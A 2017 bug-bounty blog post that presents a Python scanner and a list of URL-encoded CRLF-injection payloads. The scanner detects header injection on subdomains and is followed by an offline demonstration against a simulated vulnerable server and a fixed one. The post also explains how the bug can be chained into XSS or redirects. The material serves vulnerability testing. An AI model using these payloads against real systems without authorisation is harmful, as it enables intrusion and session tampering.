Automating CRLF

Easy Python script to find top-level CRLF bugs.

Automating CRLF Bugs

CRLF injection is easy to detect because a successful injection lets you add a response header of your own. Detection is simply attempting the injection against a web server and then checking for your unique header in the response. Let's look at the steps we will take.

  1. Get full URL of service to test
  2. Add payload at the end of URL
  3. Send GET request to this modified URL
  4. Check for our Set-Cookie header in the response headers
  5. Go to step 2 until we have tried all of our payloads

To build a payload list I went through openly disclosed bug bounty reports and collected every unique payload I found.

The code

Assuming the company's subdomains are in a text file, the code to automate this looks like the following:

import requests
import urllib3

# verify=False below turns off TLS certificate checks (useful for hosts with
# self-signed or expired certificates); silence the warning it raises per request
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


# each payload should create a Set-Cookie: mycookie=myvalue header if vulnerable
PAYLOADS = [r"%0D%0ASet-Cookie:mycookie=myvalue",
            r"%0d%0aSet-Cookie:mycookie=myvalue",
            r"crlf%0dSet-Cookie:mycookie=myvalue",
            r"crlf%0aSet-Cookie:mycookie=myvalue",
            r"%23%0dSet-Cookie:mycookie=myvalue",
            r"%0dSet-Cookie:mycookie=myvalue",
            r"%0ASet-Cookie:mycookie=myvalue?foo",
            r"%0aSet-Cookie:mycookie=myvalue",
            r"/xxx%0ASet-Cookie:mycookie=myvalue;"]

# protocol either 'http://' or 'https://'
def crlf(protocol, subdomain):
    for payload in PAYLOADS:
        url = "%s%s/%s" % (protocol, subdomain, payload)
        try:
            # allow_redirects=False: the injected header lives on the first
            # response, which is usually a redirect we must not follow
            r = requests.get(url, verify=False, timeout=.5, allow_redirects=False)
            # requests parses Set-Cookie headers into r.cookies for us
            for name in r.cookies.keys():
                if "mycookie" in name:
                    print("[+] Vulnerable: %s" % url)
        except requests.Timeout:
            # host is not answering; skip its remaining payloads
            print("\tTimeout")
            return False
        except Exception as e:
            print("ERROR STRING: %s" % url)
            print(str(e))
    return True

if __name__ == "__main__":
    with open("bug_bounty.txt", "r") as f:
        for subdomain in f:
            subdomain = subdomain.strip()  # drop the trailing newline
            if subdomain:
                crlf("https://", subdomain)

More information

This code works on a text file called "bug_bounty.txt" in the same directory as the script, with one subdomain per line. For instance, a valid text file looks like the following:

www.google.com
developer.google.com

The script then tries every payload against each subdomain, prepending the protocol that the main block passes to crlf() (https:// as written); change that argument to http:// to test plain HTTP instead.
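To show what the scanner is actually looking for without touching a live host, here is the same five-step procedure run offline against a hypothetical endpoint that reflects the request path into a Location header, once vulnerable and once fixed. This is an added example, not the post's own script: the two server functions, the example.invalid host and the raw-response parser are constructed for illustration. The parser deliberately splits on CRLF, bare CR and bare LF so that every variant in the payload list is exercised; against a real target the bare-CR and bare-LF variants only work when the server or client treats them as line terminators, which is why the list carries all three.

```python
import re
from urllib.parse import unquote

# The payload list from the post; the scanner appends each to "<scheme>://<host>/".
PAYLOADS = [
    r"%0D%0ASet-Cookie:mycookie=myvalue",
    r"%0d%0aSet-Cookie:mycookie=myvalue",
    r"crlf%0dSet-Cookie:mycookie=myvalue",
    r"crlf%0aSet-Cookie:mycookie=myvalue",
    r"%23%0dSet-Cookie:mycookie=myvalue",
    r"%0dSet-Cookie:mycookie=myvalue",
    r"%0ASet-Cookie:mycookie=myvalue?foo",
    r"%0aSet-Cookie:mycookie=myvalue",
    r"/xxx%0ASet-Cookie:mycookie=myvalue;",
]


def vulnerable_redirect(path):
    """Hypothetical server (constructed for this example): it URL-decodes the
    request path and copies it straight into a Location header, so a CR/LF in
    the path ends that header and whatever follows becomes a new header."""
    target = unquote(path)
    response = (
        "HTTP/1.1 302 Found\r\n"
        "Location: https://example.invalid" + target + "\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    )
    return response.encode("latin-1")


def hardened_redirect(path):
    """The same endpoint with the fix: a header value must not contain CR or LF,
    so a request carrying either is rejected before anything is reflected."""
    target = unquote(path)
    if "\r" in target or "\n" in target:
        return b"HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
    response = (
        "HTTP/1.1 302 Found\r\n"
        "Location: https://example.invalid" + target + "\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    )
    return response.encode("latin-1")


def parse_response_headers(raw):
    """Return the (name, value) header pairs of a raw HTTP response.
    Lenient on line endings (CRLF, bare CR, bare LF) so all payload variants
    above produce a separate header line; a strict parser honours only CRLF."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    lines = re.split(rb"\r\n|\r|\n", head)
    headers = []
    for line in lines[1:]:  # lines[0] is the status line
        name, sep, value = line.partition(b":")
        if sep:
            headers.append((name.strip().lower().decode("latin-1"),
                            value.strip().decode("latin-1")))
    return headers


def injected_cookie_present(raw, marker="mycookie"):
    """Step 4: did a Set-Cookie header carrying our unique cookie name appear?"""
    return any(name == "set-cookie" and value.startswith(marker + "=")
               for name, value in parse_response_headers(raw))


def scan(server, payloads=PAYLOADS):
    """Steps 2 to 5: send every payload to one endpoint and return the payloads
    whose response contained the injected header."""
    hits = []
    for payload in payloads:
        raw = server("/" + payload)
        if injected_cookie_present(raw):
            hits.append(payload)
    return hits


if __name__ == "__main__":
    print("vulnerable server:", scan(vulnerable_redirect))
    print("hardened server:  ", scan(hardened_redirect))
```

Because the check keys on a cookie name you chose, a legitimate Set-Cookie from the application cannot produce a false positive, and one hit per host is enough evidence, so a real scanner can stop at the first payload that lands rather than trying all nine.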

You might get lucky and be paid for this bug on its own, but usually it doesn't pay by itself. You can turn it into a chained vulnerability if you can locate a cookie that the application reads insecurely: use the injected Set-Cookie header to set that cookie to your payload, then navigate to the page that reads it to have the XSS or URL redirection fire.

Good luck hunting!

Written on March 20, 2017